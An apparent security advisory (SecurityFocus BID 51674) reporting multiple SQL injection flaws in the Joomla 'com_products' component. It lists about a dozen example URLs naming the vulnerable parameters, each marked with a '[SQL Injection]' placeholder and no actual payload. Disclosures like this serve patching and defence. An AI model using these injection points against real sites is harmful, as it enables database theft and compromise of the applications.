18 lines
No EOL
1.4 KiB
Text
18 lines
No EOL
1.4 KiB
Text
source: https://www.securityfocus.com/bid/51674/info
|
|
|
|
The 'com_products' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
http://www.example.com/index.php?option=com_products&task=category&catid=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&id=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&catid=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&product_id=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&task=detail&parent_id=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&task=edit_productdetail&id_pro=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&Itemid=53&controller=home&task=displayitem&itemcode=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&catid=1&Cat[]=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&cid=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&view=products&id=19&cat=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&task=product&pid=[SQL Injection]
|
|
http://www.example.com/index.php?option=com_products&Itemid=[SQL Injection] |